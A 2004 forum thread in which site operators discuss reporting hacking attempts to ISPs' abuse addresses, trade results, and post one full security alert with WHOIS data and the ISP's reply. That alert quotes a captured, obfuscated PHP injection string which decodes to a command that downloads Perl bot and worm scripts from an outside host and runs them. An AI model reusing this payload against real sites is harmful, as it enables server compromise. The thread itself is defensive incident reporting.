| Author |
Message |
crypto
Worker
Joined: Aug 02, 2004
Posts: 165
|
 Posted:
Sun Dec 26, 2004 1:06 pm |
|
Do you report hacking attempt to abuse@hackers_isp.com if you found out that somebody has tryed to hack or messup with your site?
I don't know that does this help but I'll forward nukesentinel alerts to the abuse@ email address. |
| |
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Sun Dec 26, 2004 2:47 pm |
|
I do if it's US based. I have had reasonably good success with AOL, ComCast, and a few others. |
| |
|
|
|
|
Muffin
Client
Joined: Apr 10, 2004
Posts: 649
Location: UK
|
| Posted:
Sun Dec 26, 2004 3:54 pm |
|
I hadnt, but I did think it would be a good idea if it could be written into sentinel somehow. |
_________________
Classic Mini rules the bends & bends the rules!
[img] |
|
|
|
|
Raven
|
| Posted:
Sun Dec 26, 2004 5:12 pm |
|
Somewhere along the line the user has to take accountability  |
| |
|
|
|
|
Muffin
|
| Posted:
Sun Dec 26, 2004 6:07 pm |
|
Yea we cant rely too much on the experts lol
I'll make sure I email abuse in future then hehhee |
| |
|
|
|
|
manunkind
Client
Joined: Apr 26, 2004
Posts: 368
Location: Albuquerque, NM
|
| Posted:
Mon Dec 27, 2004 10:07 am |
|
I've never did it before, but with this Santy stuff, I am now. I have gotten a pretty good response so far. |
| |
|
|
|
Viper-
New Member
Joined: Dec 24, 2004
Posts: 5
|
| Posted:
Mon Dec 27, 2004 10:43 pm |
|
| manunkind wrote: | | I've never did it before, but with this Santy stuff, I am now. I have gotten a pretty good response so far. |
Would you mind sharing some of the responses you've gotten so far and which ISP that responded?
I wouldn't mind having a list of some sorts of ISP's that really do take abuse serious and will actually respond.
Before I implemented Raven's quick fix, I had received over 500 e-mails from Sentinel banning IP's in less than 24 hours. Something like that would be hard to e-mail the various IP owners, but it's something I would do over a period of a week or so.
Thanks,
Viper |
_________________
Only registered users can see links on this board! Get registered or login!
www.ViperWebHosting.net |
|
|
|
|
mds
Client
Joined: Dec 24, 2004
Posts: 194
Location: Michigan
|
| Posted:
Mon Dec 27, 2004 11:03 pm |
|
heres 1 i sent with the info and the reply to what i sent....
*EDITED FOR MY SECURITY* ha ha
Merry Christmas.
Thanks for your feedback. The server in question is owned and managed
by one of our customers. He has had an intruder on the machine or been
attacked by a worm. He has fixed the problem now.
Dag Øien
Domeneshop AS
På 25. des 2004 kl. 03:29 skrev <me@mysite.org>:
> From me@mysite.com Fri Dec 24 17:59:16 2004
>
> X-Apparently-To:
> me@yahoo.com via XXX.XXX.XXX.XXX; Fri, 24 Dec 2004
> 17:58:19 -0800
>
> Authentication-Results:
> XXXXXX.mail.XXX.yahoo.com from=mysite.com;
> domainkeys=neutral (no sig)
>
> X-Originating-IP:
> [XX.XXX.XXX.XXX]
>
> Return-Path:
> <root@hostXX.myhost.com>
>
> Received:
> from XXX.XXX.XXX.XXX (HELO hostXX.myhost.com) (XX.XX.XXX.XXX) by
> mta328.mail.scd.yahoo.com with SMTP; Fri, 24 Dec 2004 17:58:18 -0800
>
> Received:
> (mail XXXX invoked by uid XXXX); 25 Dec 2004 01:59:16 -0000
>
> Delivered-To:
> XXXX-me@mysite.com
>
> Received:
> (mail XXXX invoked by uid XX); 25 Dec 2004 01:59:16 -0000
>
> Date:
> 25 Dec 2004 01:59:16 -0000
>
> Message-ID:
> <XXXXXXXXXX.myhost.com>
>
> To:
> me@mysite.com
>
> Subject:
> Blocked on My site.com
>
> From:
>
>
> X-Mailer:
> NukeSentinel™
>
> Content-Length:
> 797
> Date & Time: 2004-12-24 17:59:15
> Blocked IP: 194.63.250.67
> User ID: (1)
> Reason: Abuse-Script
> --------------------
> User Agent: lwp-trivial/1.41
> Query String:
> www.michigandirtslingers.com/modules.php?
> name=Forums&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)
> %252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr
> (119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(119)%2
> 52echr(119)%252echr(119)%252echr(46)%252echr(119)%252echr(101)%252echr(
> 9 %252echr(109)%252echr(97)%252echr(115)%252echr(116)%252echr(101)%252
> echr(114)%252echr(45)%252echr(105)%252echr(116)%252echr(46)%252echr(105
> )%252echr(116)%252echr(47)%252echr(116)%252echr(101)%252echr(114)%252ec
> hr(114)%252echr(111)%252echr(114)%252echr(9%252echr(111)%252echr(116)
> %252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr
> (112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(116)%2
> 52echr(101)%252echr(114)%252echr(114)%252echr(111)%252echr(114)%252echr
> (9%252echr(111)%252echr(116)%252echr(46)%252echr(116)%252echr(120)%25
> 2echr(116)%252echr(59)%252echr(119)%252echr(103)%252echr(101)%252echr(1
> 16)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252e
> chr(119)%252echr(101)%252echr(9%252echr(109)%252echr(97)%252echr(115)
> %252echr(116)%252echr(101)%252echr(114)%252echr(45)%252echr(105)%252ech
> r(116)%252echr(46)%252echr(105)%252echr(116)%252echr(47)%252echr(116)%2
> 52echr(101)%252echr(114)%252echr(114)%252echr(111)%252echr(114)%252echr
> (119)%252echr(111)%252echr(114)%252echr(109)%252echr(46)%252echr(116)%2
> 52echr(120)%252echr(116)%252echr(59)%252echr(112)%252echr(101)%252echr(
> 114)%252echr(108)%252echr(32)%252echr(116)%252echr(101)%252echr(114)%25
> 2echr(114)%252echr(111)%252echr(114)%252echr(119)%252echr(111)%252echr(
> 114)%252echr(109)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%2
> 52e%2527
> Forwarded For: none
> Client IP: none
> Remote Address: 194.63.250.67
> Remote Port: 53540
> Request Method: GET
> --------------------
> DNSStuffDNSStuffSorry, you have triggered our rate limiting system.
> Please try again later. If you are reading this in a web browser, we
> apologize -- we want you to use the site as much as you like. What we
> do
> not like is when people use automated programs with our free service.
> We have the addresses uce@ftc.gov and fraud@ftc.gov here in case
> spammers are harvesting addresses from our site. If you are not
> automatically removed within a few minutes, you can contact us (using
> our info@
> address at the domain in the URL you are at; please refer to 43ddeb42)
> to
> get access again more quickly. Thanks!
>
>
> WHOIS results for 194.63.250.67
>
> Generated by www.DNSstuff.com
> Country: EU
>
> ARIN says that this IP belongs to RIPE; I'm looking it up there.
>
>
> Using 0 day old cached answer (or, you can get fresh results).
> Hiding E-mail address (you can get results with the E-mail address).
>
> % This is the RIPE Whois query server #2.
> % The objects are in RPSL format.
> %
> % Rights restricted by copyright.
> % See http://www.ripe.net/db/copyright.html
>
> inetnum: 194.63.248.0 - 194.63.255.255
> netname: NO-HYPNOTECH
> descr: Hypnotech AS
> descr: Local ISP
> country: NO
> admin-c: HH2777-RIPE
> tech-c: HH2777-RIPE
> status: ASSIGNED PI
> notify: ***********@hypnotech.com
> notify: ****@global-ip.net
> mnt-by: RIPE-NCC-HM-PI-MNT
> mnt-by: GLOBALONE-MNT
> changed: **********@ripe.net 19991109
> source: RIPE
>
> route: 194.63.248.0/21
> descr: DOMENESHOP
> origin: AS12996
> notify: **********@domeneshop.no
> mnt-by: AS12996-MNT
> changed: **********@domeneshop.no 20040421
> source: RIPE
>
> role: Domeneshop Hostmaster
> address: Domeneshop AS
> address: Nedre vaskegang 6
> address: NO-0186 Oslo
> address: Norway
> phone: +47 22 94 33 33
> fax-no: +47 22 94 33 34
> e-mail: **********@domeneshop.no
> admin-c: SS784
> tech-c: SS784
> nic-hdl: HH2777-RIPE
> notify: **********@domeneshop.no
> changed: **********@domeneshop.no 20040421
> source: RIPE
>
>
> |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
